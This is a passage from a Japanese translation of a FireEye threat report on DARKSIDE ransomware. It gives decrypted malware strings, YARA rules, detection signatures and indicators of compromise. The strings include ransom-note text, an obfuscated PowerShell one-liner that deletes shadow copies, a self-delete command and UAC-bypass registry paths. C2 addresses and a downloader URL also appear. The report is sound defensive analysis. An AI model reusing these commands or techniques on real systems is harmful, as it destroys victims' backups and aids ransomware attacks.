\r\n----------------------------------------------\r\nUsing a TOR browser:\r\n1) Download and install TOR browser from this site: https://torproject.org/\r\n2) Open our website: http://darksidfqzcuhtk2[.]onion/<REDACTED>\r\n\r\nWhen you open our website, put the following data in the input form:\r\nKey:\r\<REDACTED>\r\n\r\n!!! DANGER !!!\r\nDO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n!!! DANGER !!!\r\n
-path
INF
DBG
/C DEL /F /Q
 >> NUL
ComSpec
README
.TXT
Start Encrypting Target Folder
Encrypt Mode - AUTO
Started %u I/O Workers
Encrypted %u file(s)
Start Encrypt
[Handle %u]
File Encrypted Successful
Encrypt Mode - FAST
Encrypt Mode - FULL
This is a Russian-Speaking System, Exit
System Language Check
Encrypting Network Shares
Encrypting Local Disks
README
.TXT
Encrypt Mode - AUTO
Started %u I/O Workers
Encrypted %u file(s)
Start Encrypt
[Handle %u]
File Encrypted Successful
Encrypt Mode - FAST
Encrypt Mode - FULL
Terminating Processes
Deleting Shadow Copies
Uninstalling Services
Emptying Recycle Bin
This is a Russian-Speaking System, Exit
System Language Check
Start Encrypting All Files
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F7763
6F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2
*$_,2))};iex $s"
root/cimv2
WQL
SELECT * FROM Win32_ShadowCopy
ID
Win32_ShadowCopy.ID='%s'
.exe
LOG%s.TXT
README%s.TXT
Software\Classes\exefile\shell\open\command
\slui.exe
runas
Elevation:Administrator!new:
{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
explorer.exe

図19:復号化された文字列

付録B:検知とハンティングのインジケーター

Yara検知

以下のYARAルールは、適切なパフォーマンスを確保し、誤検出のリスクを制限するために、組織独自の内部テスト・プロセスを通じて最初に検証されることなく、生産システムで使用したり、ブロック・ルールに通知したりすることを目的とはしていません。これらのルールは、関連する活動を特定するためのハンティングの出発点として機能することを目的としていますが、マルウェア・ファミリーが変更された場合は、経時的な修正が必要になることがあります。

rule Ransomware_Win_DARKSIDE_v1__1
{
    meta:
        author = “FireEye”
        date_created = “2021-03-22”
        description = “Detection for early versions of DARKSIDE ransomware samples based on the encryption mode configuration values.”
        md5 = “1a700f845849e573ab3148daef1a3b0b”   
    strings:
        $consts = { 80 3D [4] 01 [1-10] 03 00 00 00 [1-10] 03 00 00 00 [1-10] 00 00 04 00 [1-10] 00 00 00 00 [1-30] 80 3D [4] 02 [1-10] 03 00 00 00 [1-10] 03 00 00 00 [1-10] FF FF FF FF [1-10] FF FF FF FF [1-30] 03 00 00 00 [1-10] 03 00 00 00 }
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and $consts
}

図21:DARKSIDE Dropper YARAルール

rule Dropper_Win_Darkside_1
{
    meta:
        author = "FireEye"
        date_created = "2021-05-11"
        description = "Detection for on the binary that was used as the dropper leading to DARKSIDE."
    strings:
        $CommonDLLs1 = "KERNEL32.dll" fullword
        $CommonDLLs2 = "USER32.dll" fullword
        $CommonDLLs3 = "ADVAPI32.dll" fullword
        $CommonDLLs4 = "ole32.dll" fullword
        $KeyString1 = { 74 79 70 65 3D 22 77 69 6E 33 32 22 20 6E 61 6D 65 3D 22 4D 69 63 72 6F 73 6F 66 74 2E 57 69 6E 64 6F 77 73 2E 43 6F 6D 6D 6F 6E 2D 43 6F 6E 74 72 6F 6C 73 22 20 76 65 72 73 69 6F 6E 3D 22 36 2E 30 2E 30 2E 30 22 20 70 72 6F 63 65 73 73 6F 72 41 72 63 68 69 74 65 63 74 75 72 65 3D 22 78 38 36 22 20 70 75 62 6C 69 63 4B 65 79 54 6F 6B 65 6E 3D 22 36 35 39 35 62 36 34 31 34 34 63 63 66 31 64 66 22 }
        $KeyString2 = { 74 79 70 65 3D 22 77 69 6E 33 32 22 20 6E 61 6D 65 3D 22 4D 69 63 72 6F 73 6F 66 74 2E 56 43 39 30 2E 4D 46 43 22 20 76 65 72 73 69 6F 6E 3D 22 39 2E 30 2E 32 31 30 32 32 2E 38 22 20 70 72 6F 63 65 73 73 6F 72 41 72 63 68 69 74 65 63 74 75 72 65 3D 22 78 38 36 22 20 70 75 62 6C 69 63 4B 65 79 54 6F 6B 65 6E 3D 22 31 66 63 38 62 33 62 39 61 31 65 31 38 65 33 62 22 }
        $Slashes = { 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C }
    condition:
        filesize < 2MB and filesize > 500KB and uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (all of ($CommonDLLs*)) and (all of ($KeyString*)) and $Slashes
}

図21:DARKSIDE Dropper YARAルール

rule Backdoor_Win_C3_1
{
    meta:
        author = “FireEye”
        date_created = "2021-05-11"
        description = "Detection to identify the Custom Command and Control (C3) binaries."
        md5 = "7cdac4b82a7573ae825e5edb48f80be5"
    strings:
        $dropboxAPI = "Dropbox-API-Arg"
        $knownDLLs1 = "WINHTTP.dll" fullword
        $knownDLLs2 = "SHLWAPI.dll" fullword
        $knownDLLs3 = "NETAPI32.dll" fullword
        $knownDLLs4 = "ODBC32.dll" fullword
        $tokenString1 = { 5B 78 5D 20 65 72 72 6F 72 20 73 65 74 74 69 6E 67 20 74 6F 6B 65 6E }
        $tokenString2 = { 5B 78 5D 20 65 72 72 6F 72 20 63 72 65 61 74 69 6E 67 20 54 6F 6B 65 6E }
        $tokenString3 = { 5B 78 5D 20 65 72 72 6F 72 20 64 75 70 6C 69 63 61 74 69 6E 67 20 74 6F 6B 65 6E }
    condition:
        filesize < 5MB and uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (((all of ($knownDLLs*)) and ($dropboxAPI or (1 of ($tokenString*)))) or (all of ($tokenString*)))

図22:カスタム・コマンドとコントロール(C3)YARAルール

技術検知

FireEye製品は、攻撃ライフサイクルのさまざまな段階でこの活動を検知します。次の表には、これらの侵入で検出されたマルウェアや手法を特定して防止するための具体的な検知が含まれています。簡潔にするため、このリストには、FireEyeがこのキャンペーン、または広範な侵入オペレーションで観測した、BEACON、BloodHound/SharpHound、および他の一般的なツールやマルウェアに関する検知は含まれていません。

プラットフォーム

シグネチャ名称

Network Security
Email Security
Detection On Demand
Malware Analysis
File Protect

  • Ransomware.SSL.DarkSide
  • Trojan.Generic
  • Ransomware.Linux.DARKSIDE
  • Ransomware.Win.Generic.MVX
  • Ransomware.Win.DARKSIDE.MVX
  • Ransomware.Linux.DARKSIDE.MVX
  • Ransomware.Win32.DarkSide.FEC3
  • FE_Ransomware_Win_DARKSIDE_1
  • FE_Ransomware_Win32_DARKSIDE_1
  • FE_Ransomware_Linux64_DARKSIDE_1
  • FE_Ransomware_Linux_DARKSIDE_1
  • FEC_Trojan_Win32_Generic_62
  • FE_Loader_Win32_Generic_177
  • FE_Loader_Win32_Generic_197
  • FE_Backdoor_Win_C3_1
  • FE_Backdoor_Win32_C3_1
  • FE_Backdoor_Win32_C3_2
  • FE_Backdoor_Win_C3_2
  • Backdoor.Win.C3
  • FE_Dropper_Win_Darkside_1

Endpoint Security

Real-Time (IOC)

  • BABYMETAL (BACKDOOR)
  • DARKSIDE RANSOMWARE (FAMILY)
  • SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
  • SUSPICIOUS POWERSHELL USAGE B (METHODOLOGY)

Malware Protection(AV/MG)

  • Generic.mg.*
  • Gen:Heur.FKP.17
  • Gen:Heur.Ransom.RTH.1
  • Gen:Trojan.Heur.PT.omZ@bSEA3vk
  • Gen:Variant.Razy.*
  • Trojan.CobaltStrike.CB
  • Trojan.GenericKD.*
  • Trojan.Linux.Ransom.H

UAC Protect

  • Malicious UAC bypass program detected

Helix

  • VPN ANALYTICS [Abnormal Logon]
  • WINDOWS ANALYTICS [Abnormal RDP Logon]
  • TEAMVIEWER CLIENT [User-Agent]
  • WINDOWS METHODOLOGY [Plink Reverse Tunnel]
  • WINDOWS METHODOLOGY - SERVICES [PsExec]

関連インジケーター

UNC2628

インジケーター

説明

104.193.252[.]197:443

BEACON C2

162.244.81[.]253:443

BEACON C2

185.180.197[.]86:443

BEACON C2

athaliaoriginals[.]com

BEACON C2

lagrom[.]com

BEACON C2

ctxinit.azureedge[.]net

BEACON C2

45.77.64[.]111

Login Source

181ab725468cc1a8f28883a95034e17d

BEACON Sample

UNC2659

インジケーター

説明

173.234.155[.]208

Login Source

UNC2465

インジケーター

説明

81.91.177[.]54 :7234

Remote Access

koliz[.]xyz

File Hosting

los-web[.]xyz

EMPIRE C2

sol-doc[.]xyz

Malicious Infrastructure

hxxp://sol-doc[.]xyz/sol/ID-482875588

Downloader URL

6c9cda97d945ffb1b63fd6aabcb6e1a8

Downloader LNK

7c8553c74c135d6e91736291c8558ea8

VBS Launcher

27dc9d3bcffc80ff8f1776f39db5f0a4

Ngrok Utility

DARKSIDEランサムウェア暗号化装置

DARKSIDE サンプル MD5

04fde4340cc79cd9e61340d4c1e8ddfb

0e178c4808213ce50c2540468ce409d3

0ed51a595631e9b4d60896ab5573332f

130220f4457b9795094a21482d5f104b

1a700f845849e573ab3148daef1a3b0b

1c33dc87c6fdb80725d732a5323341f9

222792d2e75782516d653d5cccfcf33b

29bcd459f5ddeeefad26fc098304e786

3fd9b0117a0e79191859630148dcdc6d

47a4420ad26f60bb6bba5645326fa963

4d419dc50e3e4824c096f298e0fa885a

5ff75d33080bb97a8e6b54875c221777

66ddb290df3d510a6001365c3a694de2

68ada5f6aa8e3c3969061e905ceb204c

69ec3d1368adbe75f3766fc88bc64afc

6a7fdab1c7f6c5a5482749be5c4bf1a4

84c1567969b86089cc33dccf41562bcd

885fc8fb590b899c1db7b42fe83dddc3

91e2807955c5004f13006ff795cb803c

9d418ecc0f3bf45029263b0944236884

9e779da82d86bcd4cc43ab29f929f73f

a3d964aaf642d626474f02ba3ae4f49b

b0fd45162c2219e14bdccab76f33946e

b278d7ec3681df16a541cf9e34d3b70a

b9d04060842f71d1a8f3444316dc1843

c2764be55336f83a59aa0f63a0b36732

c4f1a1b73e4af0fbb63af8ee89a5a7fe

c81dae5c67fb72a2c2f24b178aea50b7

c830512579b0e08f40bc1791fc10c582

cfcfb68901ffe513e9f0d76b17d02f96

d6634959e4f9b42dfc02b270324fa6d9

e44450150e8683a0addd5c686cd4d202

f75ba194742c978239da2892061ba1b4

f87a2e1c3d148a67eaeb696b1ab69133

f913d43ba0a9f921b1376b26cd30fa34

f9fc1a1a95d5723c140c2a8effc93722

 

本ブログは、米FireEyeが公開した May 11, 2021 「Shining a Light on DARKSIDE Ransomware Operations」(英語)の日本語抄訳版です。

日本語版:Reviewed by Noriko Yokokawa